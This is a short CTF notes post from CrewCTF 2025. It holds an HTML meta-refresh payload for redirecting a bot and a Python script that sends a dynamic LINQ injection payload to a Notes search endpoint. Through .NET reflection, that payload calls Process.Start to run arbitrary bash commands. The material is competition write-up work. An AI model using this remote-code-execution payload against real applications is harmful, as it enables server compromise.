CTF Notes and Payloads

R3zk0n · September 22, 2025

Research   CTF   Fun

Contents

CrewCTF - 2025

• Love Notes
• Payload to redirect the bot.

Resources:

• Leaking Text Notes with CSS

Solves:

• Authors Writeup

    <meta http-equiv="refresh" content="0;url=<whatever>?test=meta_refresh_works">
  

LINQ Injection Payloads

The bug is related to LINQ Injection the information and resources linked it to is

1. NCC Linq Injection
2. ZZZ Project Core Allows Remote Github

Solves:

1. Reflective Solve

import httpx

url = "http://localhost:8080"

payload = r'") && "".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredMethods.Where(it.Name == "CreateInstanceAndUnwrap").First().Invoke("".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredProperties.Where(it.name == "CurrentDomain").First().GetValue(null), "System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089; System.Diagnostics.Process".Split(";".ToCharArray())).GetType().Assembly.DefinedTypes.Where(it.Name == "Process").First().DeclaredMethods.Where(it.name == "Start").Take(3).Last().Invoke(null, "/bin/bash;-c \"COMMAND\"".Split(";".ToCharArray())).GetType().ToString() == ("'

command = input("Input>")
payload = payload.replace("COMMAND", command)

r = httpx.get(f"{url}/Notes", params=dict(search=payload))
print(r.text)

Share: Twitter, Facebook